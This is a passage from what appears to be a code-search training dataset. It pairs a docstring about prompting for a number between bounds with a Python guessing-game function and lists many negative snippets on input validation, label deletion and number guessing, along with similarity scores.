TaggitTag = apps.get_model('taggit', 'Tag')\n TaggitTag.objects.all().delete()", "def delete(log, args):\n log('dataset id: {highlight}{id}{reset}',\n highlight=Fore.GREEN,\n id=args.id,\n reset=Style.RESET_ALL)\n log.warn('delete dataset command coming soon.')", "def unlabel_messages(self, org, messages, label):\n pass", "def remove(self,\n label: str,\n **kwargs) -> AddressBookEntryModel:\n request_model = RemoveRequest(label=label)\n data = self.delete(request_model, **kwargs)\n data['address'] = Address(address=data['address'], network=self._network)\n return AddressBookEntryModel(**data)", "def remove_from_repository(user_id):\n try:\n repository.delete_by_id(user_id)\n except KeyError:\n raise", "def delete(self):\n self.parser.add_argument('lp_id',\n help=\"Language pack id\")\n args = self.parser.parse_args()\n self.client.languagepacks.delete(lp_id=args.lp_id)", "def svn_fs_delete_berkeley(*args):\r\n return _fs.svn_fs_delete_berkeley(*args)", "def removeLabelFromSpace(self, label, space):\n return self.pm_getSpaceManager().removeLabelFromSpace(self._unbox(label), self._unbox(space))", "def clearLabelMap(self,label=None):\r\n # productive\r\n profprint()\r\n widget = slicer.modules.NeedleFinderWidget\r\n print \"clearing label map\"\r\n self.undoRedo.saveState()\r\n labelImage = self.labelMapNode.GetImageData()\r\n shape = list(labelImage.GetDimensions()).reverse() # ??? this code has no effect, shape=None !!!\r\n labelArray = vtk.util.numpy_support.vtk_to_numpy(labelImage.GetPointData().GetScalars()).reshape(shape)\r\n if not label:\r\n labelArray[:] = 0\r\n else:\r\n labelArray[labelArray==label]=0\r\n self.editUtil.markVolumeNodeAsModified(widget.labelMapNode)", "def test_heads_pop_removes_branch(repository: Repository) -> None:\n heads = repository.heads\n heads[\"branch\"] = repository.head.commit\n heads.pop(\"branch\")\n assert \"branch\" not in heads", "def delete(self, *args, **kwargs):\n self.image.delete()\n super(Recipe, self).delete(*args, **kwargs)", "def logbook_delete(lb):\n return IMPL.logbook_delete(lb)", "def delete(self, request, p_name):\n project = Project.objects.get(name=p_name)\n connectors = project.connector_set.all()\n connectors.delete()\n if os.path.isfile(project.project_location):\n os.remove(project.project_location)\n project.delete()\n return HttpResponse(HTTPStatus.OK)", "def removeAutolabel(call, args=(), kwargs={}, nodeClass='*'):", "def delete(self, name):\n self.backend.delete(name)", "def set_labels(repo: Repository, labels: list[Label]):\n\n log.info(f\"Fetching existing labels from {repo.full_name}\")\n existing_labels = {label.name.casefold(): label for label in repo.get_labels()}\n log.info(f\"Found {len(existing_labels)} existing labels\")\n\n for label in labels:\n qualified_name = label.qualified_name\n folded_name = qualified_name.casefold()\n if folded_name not in existing_labels:\n log.info(f\"Creating label {qualified_name}\")\n repo.create_label(**label.api_arguments)\n elif label != existing_labels[folded_name]:\n log.info(f\"Updating label {qualified_name}\")\n existing_label = existing_labels[folded_name]\n existing_label.edit(**label.api_arguments)\n else:\n log.info(f\"Label {qualified_name} already exists\")", "def delete(self, *args, **kwargs):\n pass", "def delete(self, *args, **kwargs):\n pass", "async def slashtag_remove(self, ctx: commands.Context, *, tag: GuildTagConverter):\n await ctx.send(await tag.delete())", "def delete_inV(self, *labels):\r\n self._simple_deletion('inV', labels)", "def test_text_classifier_del(self):\n pass", "async def delete(self, ctx: \"IceTeaContext\", *, otag: TagConverter):\n tag: models.Tag = otag\n if tag.alias:\n if ctx.author.guild_permissions.administrator or tag.author == ctx.author.id:\n try:\n await tag.delete()\n await ctx.send(\"aliases deleted\")\n except:\n await ctx.send(\"Alias unsuccessfully deleted\")\n elif not tag.alias:\n if ctx.author.guild_permissions.administrator or tag.author == ctx.author.id:\n try:\n await tag.delete()\n await ctx.send(\"Tag and all aliases deleted\")\n except:\n await ctx.send(\"Tag unsuccessfully deleted\")\n else:\n await ctx.send(\"No Tag with that name found\")", "def remove_labels(self, test):\n ii = 0\n while ii < len(self.labels):\n if test(self.labels[ii]):\n self.labels.pop(ii)\n else:\n ii += 1\n return self", "def remove_labels(self, test):\n ii = 0\n while ii < len(self.labels):\n if test(self.labels[ii]):\n self.labels.pop(ii)\n else:\n ii += 1\n return self", "def remove_images_without_label(path_folder):\n\n\n #labels = os.listdir(path_folder + \"labels/val/\")\n labels = os.listdir(path_folder + \"labels/val/\")\n images = os.listdir(path_folder + \"images/val/\")\n for i in images:\n name_i = i.split(\".\")\n if name_i[0] + '.xml' not in labels:\n os.remove(path_folder + \"images/val/\" + i)" ]
[ "0.7348744", "0.716896", "0.7127642", "0.6931051", "0.6877669", "0.67660433", "0.67263836", "0.67033213", "0.6610836", "0.6601114", "0.6599512", "0.64673704", "0.64669335", "0.64562386", "0.6455143", "0.63759565", "0.6242319", "0.6198236", "0.61135364", "0.60569805", "0.6021209", "0.59816724", "0.5958259", "0.5939189", "0.5937705", "0.5898544", "0.5885807", "0.5855245", "0.5850653", "0.58377445", "0.5789876", "0.57627934", "0.57513314", "0.5738411", "0.5730703", "0.5697638", "0.56960636", "0.5687566", "0.56831104", "0.5676633", "0.56683296", "0.56574345", "0.56402993", "0.56383896", "0.5621577", "0.56136835", "0.55925643", "0.55852485", "0.55705905", "0.5548545", "0.5545445", "0.5541526", "0.55296934", "0.5526105", "0.5510325", "0.55090445", "0.54946715", "0.54793483", "0.54655725", "0.5456382", "0.5451846", "0.5439509", "0.5412041", "0.5407509", "0.5404987", "0.53997165", "0.5395931", "0.5393938", "0.53937817", "0.5387629", "0.5384648", "0.53686714", "0.5350697", "0.53444433", "0.5339747", "0.5320025", "0.53149575", "0.5313689", "0.5311122", "0.5302915", "0.53002524", "0.5298574", "0.52813345", "0.52787334", "0.5274709", "0.5274021", "0.5267229", "0.5257208", "0.52561533", "0.5251777", "0.5250819", "0.5245947", "0.5245947", "0.52452964", "0.5241319", "0.52298886", "0.52284443", "0.5221924", "0.5221924", "0.5216943" ]
0.8369633
0
Ask for a number between low and high until actually given one. Ask for a number, and if the response is outside the bounds keep asking until you get a number that you think is OK
def stubborn_asker(low, high): import random a=random.randint(1,100) for i in range(1,10): n=input('enter the number: ') if n.isdigit(): n=int(n) if n==a: return('Correct') break elif n>a: return('The number is bigger.') elif n<a: return('The number is smaller.') else: return('please enter an integer.') i+=1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ask_number(question, low, high):\n response = None\n while response not in range(low, high, 1):\n response = input(question)\n return response", "def ask_number(question, low, high):\n response = None\n while response not in range (low, high):\n response = int(input(question))\n return response", "def ask_number(question, low, high):\n response = None\n while response not in range(low, high):\n response = int(input(question))\n return response", "def ask_number(question, low, high):\n response = None\n while response not in range(low, high):\n response = int(input(question))\n return response", "def ask_number (question,low,high):\n response = None\n while response not in range(low,high):\n response = int(input(question))\n return response", "def ask_number(low, high, tries):\n the_number = None\n while the_number not in range(low, high):\n the_number = int(input(\"Enter a number between 1-100: \"))\n return the_number\n print(\"The computer has\", tries, \"tries to guess your number\\n\")", "def pick_number(low, high, limit):\n print(\"Think of a number from \" + str(low) + \" to \" +\n str(high) +\" and I will try to guess it and I will get a total of \" + str(limit) + \" tries. Press Enter when you are ready.\")\n input()", "def AskForNumberRange():\n\n\twhile True:\n\t\t# This OUTER loop will loop forever until the user enters correct integers for\n\t\t# lower and upper bound, such that lobound < hibound.\n\n\t\twhile True:\n\t\t\t# This INNER loop will loop forever until the user enters a valid value for lobound\n\t\t\tprint \"Enter the LOWER bound for the range of numbers, or press enter for default 1:\"\n\t\t\tlobound = SolicitInteger( default_return=1 )\n\t\t\tif lobound != None:\n\t\t\t\tprint \"Ok, lower bound of {}.\".format( lobound )\n\t\t\t\tbreak\n\n\t\twhile True:\n\t\t\t# This INNER loop will loop forever until the user enters a valid value for hibound\n\t\t\tprint \"Enter the UPPER bound for the range of numbers that's greater than the lowerbound, or press enter for default 20:\"\n\t\t\thibound = SolicitInteger( default_return=20 )\n\t\t\tif hibound != None:\n\t\t\t\tprint \"Ok, upper bound of {}.\".format( hibound )\n\t\t\t\tbreak\n\n\t\tif lobound < hibound:\n\t\t\t# We've got what we need! return out of this function!\n\t\t\treturn lobound, hibound\n\n\t\t# Uh oh. If we're still here, the user didn't enter in a correct range\n\t\tprint \"***Invalid input: upper bound must be greater than lower bound***\"\n\t\t# Back to the beginning of the outer loop", "def prompt_number(prompt, low_limit = 1, high_limit = 65535):\n while True:\n try:\n response = int(prompt_base(prompt))\n if low_limit <= response <= high_limit:\n return response\n except:\n pass", "def boundary(quantity, lower, upper):\r\n in_range = False\r\n while not in_range:\r\n if quantity < lower or quantity > upper:\r\n quantity = int(input(\"That is out of range, please try a number between \" + \\\r\n str(lower) + \" and \" + str(upper) + \": \"))\r\n else:\r\n in_range = True\r\n return quantity", "def get_integer(prompt: str, error_prompt: str, limits_prompt: str, min_num: int = -float('inf'),\n max_num: int = float('inf')) -> int:\n while True:\n try:\n integer = int(input(prompt))\n if max_num >= integer >= min_num:\n return integer\n print(limits_prompt)\n except ValueError:\n print(error_prompt)", "def part2():\n random_number = random.randrange(1,10,1)\n user_input = input(\"Guess the number: \")\n while(user_input != \"exit\"):\n if(int(user_input) > random_number):\n print(\"Too high\")\n elif(int(user_input) < random_number):\n print(\"Too low\")\n else:\n print(\"Exactly right\")\n user_input = input(\"Guess the number: \")", "def GetInteger(prompt=\"Please enter a number:\",\n lowerbound=0, upperbound=99,\n smaller_prompt=\"It's Smaller, please re-enter:\",\n bigger_prompt=\"It's Bigger, please re-enter:\",\n not_int_prompt=\"You did not enter a number, please re-enter:\"):\n user_input = input(prompt)\n\n def InternalFunc1(num):\n while True:\n try:\n return int(num)\n except ValueError:\n num = input(not_int_prompt)\n result = InternalFunc1(user_input)\n\n while not lowerbound <= result <= upperbound:\n if result < lowerbound:\n user_input = input(smaller_prompt)\n result = InternalFunc1(user_input)\n if upperbound < result:\n user_input = input(bigger_prompt)\n result = InternalFunc1(user_input)\n return result", "def get_number():\n valid_input = False\n while not valid_input:\n try:\n user_num = int(input(\"Enter a number between {} and {}: \".format(LOWER_BOUND, UPPER_BOUND)))\n if LOWER_BOUND <= user_num <= UPPER_BOUND:\n return user_num\n except ValueError:\n pass\n print(\"That is not a valid number !\")", "def _ask_user_range(question, first, last, default):\n\n while True:\n answer = input(question)\n if answer == \"\":\n answer = default\n break\n if re.findall(r\"[0-9+]\", answer):\n if int(answer) in range(first, last + 1):\n break\n else:\n print(\n \"Please a value between {} and {} or Return.\".format(\n first, last\n )\n )\n else:\n print(\n \"Please a number between {} and {} or Return.\".format(first, last)\n )\n\n return int(answer)", "def get_int(message, high, low=0):\r\n intValue = 1\r\n while True:\r\n try:\r\n intValue = int(input(message))\r\n except ValueError:\r\n print (\"ERROR, Entry must be a number. Please try again.\")\r\n continue\r\n if intValue <= low or intValue > high:\r\n print (\"ERROR, Entry must be greater than \" + str(low) + \" and, less than or equal to \"\\\r\n + str(high) + \". Please try again.\")\r\n continue\r\n break\r\n return intValue", "def get_int(lo, hi):\n while True:\n n = input(f\"Please enter an integer from {lo} to {hi}: \")\n try:\n n = int(n) \n except ValueError: \n print(\"It must be an integer!\") \n continue\n if n < lo: \n print(\"You can't use negative numbers...\")\n continue # needed, otherwise enters the else statement.\n if n > hi: \n print(\"Think smaller\")\n else:\n break # exit to return if meets conditions.\n return n", "def ask_number(message: str) -> int:\n global number\n assert isinstance(message, str), \"message should be a string\"\n stop_condition2 = False\n while not stop_condition2:\n try:\n number = int(input(message))\n if number < lower_range:\n print(\"Please pick a number within the range\", lower_range, \"and\", upper_range, \".\")\n elif number > upper_range:\n print(\"Please pick a number between\", lower_range, \"and\", upper_range, \".\")\n else:\n stop_condition2: bool = True\n except ValueError as ve:\n print(\"This is not a number.\")\n return number", "def guess_number(min_guess_range, max_guess_range):\n\tprint(f'guess the number between {min_guess_range} and {max_guess_range}!')\n\treturn check_input(min_guess_range, max_guess_range)", "def part2():\n randomNum = random.randint(1,9)\n guess = input('Please guess a number:')\n while (guess != randomNum) and (guess != \"exist\"):\n if randomNum > guess:\n print('too low')\n elif randomNum < guess:\n print('too high')\n guess = input('Please guess another number!:')", "def user_choice():\n number_choice=50 #for enter in a loop\n while number_choice < 0 or number_choice > 49:\n try:\n number_choice=int(input(\"enter number between 0 and 49 :\")) #ask user a number and convert it in integer\n except ValueError: # if number_choice not a number\n print(\"your enter is not a number\") #display error message\n number_choice = 50 #return in a loop\n if number_choice < 0 or number_choice >49:\n print(\"your enter is not included in range\") #display error message if number is out of range\n return number_choice", "def input_loop(menu_range):\n def check(inp, rng):\n\n try:\n chk = int(inp)\n except ValueError:\n return False\n\n if chk in range(0, rng):\n return True\n else:\n return False\n\n print('-' * 20) # spacer\n\n inpu = input('choose option: ')\n\n while not check(inpu, menu_range):\n inpu = input('try again: ')\n\n return int(inpu)", "def integer_input( min_value=0, max_value=999, default=0, \n prompt=\"please type number and press ENTER\"):\n while True:\n raw = input(prompt)\n if not raw.isdigit():\n print(\"please enter a number\")\n continue\n raw = int(raw)\n if min_value <= raw <= max_value:\n return raw\n print(\"please enter value between {} and {}\".format(min_value,\n max_value))", "def check_number(client, num, min, max):\r\n while True:\r\n try:\r\n # Convert it into integer\r\n temp = int(num)\r\n if temp >= min and temp <= max:\r\n break\r\n else:\r\n msg_client(client, \"Perfavore, inserire un numero compreso tra: \" + str(min) + \" e \" + str(max) + \": \")\r\n num= client.recv(BUFSIZ)\r\n except ValueError:\r\n msg_client(client, \"Perfavore, inserire un numero compreso tra: \" + str(min) + \" e \" + str(max) + \": \")\r\n num = client.recv(BUFSIZ) \r\n return temp", "def _readInt(self, prompt, small, large):\n prompt = prompt + ' (from ' + str(small) + ' to ' + str(large) + ')? '\n answer = small - 1 # intentionally invalid\n while not small <= answer <= large:\n try:\n answer = int(raw_input(prompt))\n if not small <= answer <= large:\n print 'Integer must be from '+str(small)+' to '+str(large)+'.'\n except ValueError:\n print 'That is not a valid integer.'\n return answer", "def valid(question, first, last):\n\n while 1:\n try:\n choice = input(question)\n if choice < first or choice > last or not isinstance(choice, int):\n print \"\\nInvalid input, please try again.\"\n else:\n return choice\n except Exception:\n print \"\\nInvalid input, please try again.\"", "def get_input():\n numb = int(input(\"Enter a number 1-10 \"))\n while True:\n if numb > 0 and numb < 10:\n return(numb)\n else:\n return(\"Please enter a value 1-10\")", "def ask_numbers(question, error):\n while True:\n value = 0\n try:\n value = int(input(question))\n except ValueError:\n print(error)\n except UnboundLocalError:\n print(error)\n except Exception:\n print(error)\n if value <= 0:\n print(\"Syötä positiivinen luku, joka on suurempi kuin 0\\n->\")\n else:\n break\n return value", "def checkRange(currentNumRange: tuple, currentLevel: int):\n\n\tlowerNumber, higherNumber = currentNumRange[0], currentNumRange[1]\n\tmid = (higherNumber + lowerNumber) // 2\n\tans = getAnswer(f\"Does your number is greater than {mid}?\", mid)\n\n\tif ans:\n\t\tlowerNumber = mid\n\telse:\n\t\thigherNumber = mid\n\n\n\treturn (lowerNumber, higherNumber)", "def pedir_entero(msg, min, max):\n while True:\n n = str(raw_input(msg))\n if not n.isdigit() :\n show_msg(\"Oops! Parece que eso no era un numero entero\")\n continue\n n = int(n)\n if n <= max and n >= min :\n return n\n else:\n show_msg(\"Numero fuera de rango\")\n continue", "def guest_num(max=20):\n rand_num = random.randint(1, 101)\n retries = 0\n while retries <= max:\n try:\n n = int(input('Input a number: '))\n if n == rand_num:\n print('YOU WIN!')\n break\n elif n > rand_num:\n print('Iputed number is great than result number. Just retry!')\n retries += 1\n else:\n print('Iputed number is less than result number. Just retry!')\n retries += 1\n except ValueError:\n print('Only can input a number!')\n except:\n print('Only can input a number!')\n else:\n print('YOU LOST!')", "def get_int_input_constrained(prompt, value_min, value_max, value_default):\n\n input_value = 0\n while input_value < 1:\n txt = input(prompt)\n try:\n input_value = min(max(int(txt), value_min), value_max)\n except ValueError:\n input_value = value_default\n\n return (True, input_value)", "def high_low():\n # Create a random number in the range [1,100] for the user to guess.\n secret_number = 37 # random.randint( 1, 100 )\n # For debugging purposes only, it's nice to know the secret.\n print( secret_number, flush=True ) # Add the flush to ensure there's no buffering.\n count = 0\n guess = 0\n low = 0\n high = 100\n # TODO 6: Implement the High Low guessing game as described in the lab document.\n while count < 7:\n guess = easygui.integerbox( \"Enter a guess between {} and {}:\".format( low, high), \"Input\", \"\", 1, 100 )\n count += 1\n if guess == secret_number:\n break\n if guess > secret_number:\n result = \"high\"\n high = guess\n else:\n result = \"low\"\n low = guess\n easygui.msgbox( \"Your guess of {} is too {}.\".format( guess, result ), \"Result\" )\n if guess == secret_number:\n easygui.msgbox(\"You win! You guessed {} in {} guesses\".format( secret_number, count ), \"Result\")\n else:\n easygui.msgbox(\"You Lose :( The secret number was {}\".format( secret_number), \"Result\")", "def PickNumber(lenList, message = ' To select the correct option pick a number in range ',min = 1, typeInput = int):\n while True:\n try:\n input1 = typeInput(input('\\n'+message+str(min)+'-'+str(lenList)+': \\t'))\n except ValueError:\n print( 'That\\'s not a number!')\n else:\n if min <= input1 <= lenList:\n return input1\n else:\n print( 'Number out of range. Try again!')", "def user_selection(num, text):\n lst = list(range(1,num+1))\n answer= 0\n while answer not in lst:\n try:\n answer = int(input(text))\n \n if answer not in range(1,num+1):\n raise ValueError\n break\n except ValueError:\n print('Select a valid Number')\n\n return answer", "def ask_for_numbers():\n requests.get(\"http://zero2.local:5000/get_num\", timeout=(20,0.02))\n return 1", "def guessnum3(num):\n low = 1 # lowest number we could guess\n high = 101 # highest number plus 1\n tries = 0\n\n # use a for loop instead of a while\n # guarantees we won't get stuck\n for _ in range(100): # we can replace the i with an '_' because we don't care about using the index\n my_guess = (low+high) // 2 # this is the mean rounded down\n tries += 1\n if my_guess == num:\n return tries # breaks loop\n elif my_guess > num:\n high = my_guess # this readjusts the higher portion of the halving algorithm\n else: # when your guess is lower than the number\n low = my_guess + 1 # readjusts the lower portion of the halving algorithm", "def NumberPick():\n hilo = 'lowest'\n num_list = []\n High = None\n while True:\n if len(num_list) == 2:\n break\n if High:\n hilo = 'highest'\n vanilla = f'Type in the {hilo} number: '\n nums = input(vanilla)\n if nums.isdigit():\n num_list.append(int(nums))\n High = True\n else:\n print('Enter only numbers.')\n print(\"The chosen number is... \" + str(randint(min(num_list), max(num_list))) + \"!\")\n start = input(\"Start again? \").lower()\n if start.startswith('y'):\n NumberPick()\n elif start.startswith('n') or QuBa(start):\n return", "def check_input(min_guess_range, max_guess_range):\n\twhile True:\n\t\ttry:\n\t\t\tplayerGuess = int(input('enter your guess: '))\n\t\t\tassert min_guess_range <= playerGuess <= max_guess_range\n\n\t\texcept AssertionError:\n\t\t\tprint('guess should be between {0} - {1}!'.format(min_guess_range, max_guess_range))\n\t\texcept ValueError:\n\t\t\tprint('numbers only!')\n\t\telse:\n\t\t\treturn playerGuess", "def evaluate_my_number(guess, random_number):\n if guess < random_number:\n print('Too low!')\n else: \n print ('Too high!')\n guess = check_raw()\n return guess", "def constrain(n: int, low: int, high: int) -> int:\n return max(min(n, high), low)", "def guess_a_number():\n\n # TODO:\n # generate a random number (uniformly distributed between 0 and 100)\n # read input from the user and validate that the input is numeric (use the function check_raw)\n # check whether the number was guessed \n # implement the functions evaluate_my_number, which checks whether the number is too high or too low\n # and print this information to the user\n # let the computer guess, therefore implement the demo_a_number function\n random_number=randint(0,100)\n \n '''versuche=0\n max_versuche=5\n guess=-1\n test= False\n while guess != random_number:\n while test == False:\n guess= input('Gib eine Zahl zwischen 0 und 100 ein: ')\n try:\n guess= int(guess)\n test=True\n except ValueError:\n print('Try Again')\n \n if guess == random_number:\n print('Du hast die Zahl erraten!')\n elif guess > random_number:\n print('Die Zahl ist zu gross')\n versuche=versuche+1\n else:\n print('Die Zahl ist zu klein')\n versuche=versuche+1'''", "def constrain(amt, low, high):\n if amt < low:\n return low\n elif amt > high:\n return high\n else:\n return amt", "def demo_a_number():\n random_number=randint(0,100)\n number=randint(0,100)\n print (random_number)\n print (number)\n if number == random_number:\n print('correct number')\n while number!=random_number:\n if number >random_number:\n print('number too high')\n number=randint(0,number)\n print(number)\n else:\n print('number too low')\n number=randint(number,100)\n print(number)\n print ('correct number: ')\n print(number)", "def guess_number():\n searched_number = random.randint(1, 10)\n while True:\n try:\n users_number = int(input(\"Guess the number: \"))\n except ValueError:\n print(\"It's not a number!\")\n continue\n if users_number > searched_number:\n print(\"Too big!\")\n elif users_number < searched_number:\n print(\"Too small!\")\n else:\n return \"You win!\"", "def get_float(message, high, low=0):\r\n\r\n while True:\r\n try:\r\n floatValue = float(input(message))\r\n except ValueError:\r\n print (\"ERROR, Entry must be a number. Please try again.\")\r\n continue\r\n if floatValue <= low or floatValue > high:\r\n print (\"ERROR, Entry must be greater than \" + str(low) + \" and, less than or equal to \"\\\r\n + str(high) + \". Please try again.\")\r\n continue\r\n break\r\n return floatValue", "def constrain(amt,low,high):\n if amt < low:\n return low\n elif amt > high:\n return high\n else:\n return amt", "def find_next(i, low, high):\n print(\"Searching from {} to {}...\".format(low, high))\n if low == high:\n set_search_addr(i, low)\n response = i.send(Compare())\n\n if response.value is True:\n print(\"Found ballast at {}; withdrawing it...\".format(low))\n i.send(Withdraw())\n return low\n return None\n\n set_search_addr(i, high)\n response = i.send(Compare())\n\n if response.value is True:\n midpoint = (low + high) // 2\n return find_next(i, low, midpoint) or find_next(i, midpoint + 1, high)", "def gameLogic(level = 0):\n\n\tallLevels = [0, 1, 2, 3, 4] #all possible levels of this game\n\t#ranges where the user must choose a number from the appropriate domain for each level\n\tnumberRanges = [(1, 500), (1, 1000), (1, 1500), (1, 2000), (1, 2500)] \n\tif level > 4:\n\t\treturn\n\tcurrentRange = numberRanges[level]\n\t\n\tprint(\"\\t\\t\\t***********************************************\")\n\tprint(f\"\\t\\t\\tKEEP IN YOUR MIND NUMBER FROM RANGE {currentRange[0]} to {currentRange[1]}!\")\n\tprint(\"\\t\\t\\t***********************************************\")\n\tready = getAnswer(\"Are you ready?\")\n\tprint(\"\\n\")\n\tif ready:\n\t\tlowerNumber, higherNumber = numberRanges[level][0], numberRanges[level][1]\n\t\trightAnswer = False\n\t\twhile (higherNumber > numberRanges[level][0] or higherNumber < numberRanges[level][1]) and not rightAnswer:\n\t\t\tmid = (higherNumber + lowerNumber) // 2\n\t\t\tans = getAnswer(f\"Does your number is {mid}?\", mid)\n\t\t\tif ans:\n\t\t\t\trightAnswer = True\n\t\t\telse:\n\t\t\t\tcurrentNumRange = lowerNumber, higherNumber\n\t\t\t\tlowerNumber, higherNumber = checkRange(currentNumRange, level)\n\n\t\tif level < 4:\n\t\t\tprint(\"\\t\\t===========================================\")\n\t\t\tprint(\"\\t\\tOK! Let's make it a little more complicated\")\n\t\t\tprint(\"\\t\\t===========================================\")\n\t\t\tlevel += 1\n\t\t\tgameLogic(level)\n\t\telse:\n\t\t\tprint(\"\\n\\t\\t\\t***************************************************\")\n\t\t\tprint(\"\\t\\t\\tEND OF GAME!\")\n\t\t\tprint(\"\\t\\t\\tI hope you made sure that I can guess any number!!\")\n\t\t\tprint(\"\\t\\t\\t******************************************************\")\n\n\telse: #don't ready\n\t\twhetherWannaContinue = getAnswer(\"OK: Do You want to continue this game? Am I waiting for you?\")\n\t\tif not whetherWannaContinue:\n\t\t\tprint(\"OK! Good bye!\")\n\t\t\treturn\n\t\telse:\n\t\t\talreadyReady = False\n\t\t\twhile not alreadyReady:\n\t\t\t\tprint(\"If you will be ready please Enter Y[es]\")\n\t\t\t\talreadyReady = getAnswer(\"Are you ready?\")\n\t\t\tgameLogic(level)", "def choose_in(low, high):\n return random.randint(low, high)", "def secure_input(self, minimum, maximum):\n wrong_input = True\n while wrong_input:\n while True:\n try:\n choice = int(input())\n break\n except ValueError:\n print(\"choisissez un chiffre qui vous est proposé dans la liste plus haut\")\n if choice < minimum or choice > maximum:\n print(\"choisissez un chiffre qui vous est proposé dans la liste plus haut\")\n else:\n wrong_input = False\n return choice", "def validate_correct_hint(self):\n is_response_hint_valid = False\n while is_response_hint_valid is False:\n hint_value = self.ask_user_input(\"Enter maximum hint threshold\")\n if not hint_value.isdigit():\n print(\"Not a number, please try again\")\n elif 0 <= int(hint_value) <= 81:\n is_response_hint_valid = True\n self.current_response = hint_value\n else:\n print(\"Number is out of the valid range, please try again\")\n return is_response_hint_valid", "def Demo():\n print(\"Users input:\", GetInteger())\n print(\"Users input:\", GetInteger(lowerbound=-3, upperbound=10))\n input(\"Please press <Enter> to exit the demo.\")", "def check_value(self, name, min_int, max_int):\n while True:\n numb = input(f\"-- {name} : Entrez une valeur comprise \"\n f\"entre {min_int} et {max_int} : \")\n try:\n check = int(numb)\n if check == 99 or min_int <= check <= max_int:\n break\n except ValueError:\n pass\n return check", "def GetRandomNumberFromLimits():\n smaller = int(input(\"Enter the smaller number: \"))\n larger = int(input(\"Enter a larger number: \"))\n return random.randint(smaller, larger)", "def ask_range(prompt, min, max, tips=[], default=None):\n print(prompt + ':')\n keys = [i for i in range(min, max+1)]\n if default is not None and default not in keys:\n raise KeyError('Default value not in range.')\n if len(keys) == len(tips):\n for key, tips in zip(keys, tips):\n print(key +'\\t-\\t'+ tips)\n elif len(tips) == 2 and len(keys) > 2:\n print(f'Range:\\n{min} ({tips[0]}) - {max} ({tips[1]})')\n else:\n print(f'Range: {min} - {max}')\n if default is None:\n hint = f'Pick an option ({min}-{max}): '\n else:\n hint = f'Pick an option ({min}-{max}) [{default}]: '\n option = input(hint)\n try:\n if option == '' and default is not None:\n return default\n elif option == '' or int(option) not in keys:\n print(f'Invalid option. Must be between {min} and {max}')\n return ask_range(prompt, min, max, tips, default)\n else:\n return int(option)\n except ValueError:\n print(f'Response must be and integer between {min} and {max}')\n return ask_range(prompt, min, max, tips, default)", "def guess_the_number(num_to_guess):\n correct = False\n answer = num_to_guess\n guesses = set()\n while not correct:\n guess = input(\"Guess a number between 0 and 99: (e to exit)\")\n if guess.upper() == 'E':\n print(\"Quitter\")\n correct = True\n break\n\n if good_integer_between(0, 99, guess):\n if int(guess) == answer:\n print('You guessed correctly wih {}!'.format(str(guess)))\n print(guesses)\n break\n elif int(guess) > answer:\n print('Your guess of {} is too high.'.format(str(guess)))\n guesses.add(int(guess))\n elif int(guess) < answer:\n print('Your guess of {} is too low.'.format(str(guess)))\n guesses.add(int(guess))\n pass", "def prompt_with_limits(prompt, default=None, low_limit=None, high_limit=None):\n msg = \"%s [%s]: \" % (prompt, default) if default is not None else \"%s: \" % prompt\n value = None\n while value is None:\n value = raw_input(msg).strip()\n if value:\n try:\n v = float(value)\n if (low_limit is not None and v < low_limit) or \\\n (high_limit is not None and v > high_limit):\n value = None\n except (ValueError, TypeError):\n value = None\n elif default is not None:\n value = default\n\n return value", "def _getCommand(self,high,menu):\n prompt=\"Enter a number from 1 to \"+str(high)\n commandRange=list(map(str,range(1,high+1)))\n error=\"Error,number must be 1 to \"+str(high)\n while True:\n print(menu)\n command=input(prompt)\n if command in commandRange:\n return int(command)\n else:\n print(error)", "def choose_number(maximum):\n while True:\n try:\n skip_lines(1)\n index = int(input(f\"Choose a number between 1 and {int(maximum)}: \"))\n if index <= 0 or index > maximum:\n raise IndexError\n break\n except ValueError:\n print(\"Oops! That's not a valid number. Try again...\")\n except IndexError:\n print(f\"Oops! That number is not possible. It has to be between 1 and {int(maximum)}. Try again...\")\n return index", "def test_pick():\r\n global user_pick\r\n while user_pick > pickno or user_pick <= 0 or type(user_pick):\r\n user_pick = int(input(\"How many balls do you want to get? (Up to 4)\"))\r\n #Keeps the number of balls picked by user to be between 0 and 4\r", "def get_number(pnum):\n global piles\n \n while True:\n userInput = int(input(\"How many? \"))\n if userInput >= 1 and userInput <= piles[pnum]:\n return userInput\n break", "def computer_guess(x):\n\n low = 1 \n high = x\n response = \"\"\n\n while response != 'c':\n\n if high != low:\n guess = random.randint(low, high)\n else:\n guess = low \n print(f\"I guessed your number and it is...{guess}\")\n break\n\n response = input(f\"Is {guess} the number you guessed? Is it high(h), low(l) or correct(c)? \").lower()\n\n if response == 'h':\n high = guess - 1\n elif response == 'l':\n low = guess + 1\n elif response == 'c':\n print(f\"Look, I correctly guessed your number as {guess}\")\n else:\n print(\"You don't deserve to play this game. You are a retarded human who can't even follow rules.\")\n break", "def get_guess(current_low, current_high):\n guess = (current_low + current_high) // 2\n return guess", "def binary_search(low, high, actual_number):\n tries = 0\n guess = 0\n\n # Write your code in here\n\n return {\"guess\": guess, \"tries\": tries}", "def main():\n # init variables\n lower_bound = 1\n higher_bound = 10\n guess = generate_guess(1, 10)\n while True:\n try:\n secret = input(\"What should the computer guess? Enter a number between 1 and 10: \")\n except ValueError:\n print(\"{} isn't a number!\".format(secret))\n while True:\n if int(guess) == int(secret):\n print(\"I guessed {}! Your number was {}! I win!\".format(guess, secret))\n play_again = input(\"Do you want to play again? (Y/n)\")\n if play_again != \"Y\":\n print(\"Thanks for playing!\")\n exit()\n else:\n main()\n elif int(guess) != int(secret):\n high_or_low = input(\"I guessed {}. Was it high or low? (H/L)\".format(guess))\n print(\"G: {}, HB: {}, LB: {}\".format(guess, higher_bound, lower_bound))\n if high_or_low == \"H\":\n higher_bound = guess - 1\n guess = generate_guess(lower_bound, higher_bound)\n elif high_or_low == \"L\":\n lower_bound = guess + 1\n guess = generate_guess(lower_bound, higher_bound)\n else:\n print(\"Please try again: \\n\")", "def user_input():\n user_number = input(\"Guess a number: \")\n try:\n user_number = int(user_number)\n except:\n print(\"Please ender a valid digit!\")\n return user_input()\n else:\n if 1 <= user_number <= 25:\n return user_number\n else:\n print(\"You need to enter a digit between 0 and 50\")\n return user_input()", "def get_positive_int(prompt):\n while True:\n n = get_int(prompt)\n if n > 0 and n < 9 :\n break\n return n", "def find_predict(number):\n \n att_counter = 0 \n min_num = 1 \n max_num = 101 \n while True:\n predict = min_num + (max_num - min_num)// 2\n att_counter +=1\n if number == predict:\n break\n elif number > predict:\n min_num = predict + 1 # set predicted number as lower limit \n elif number 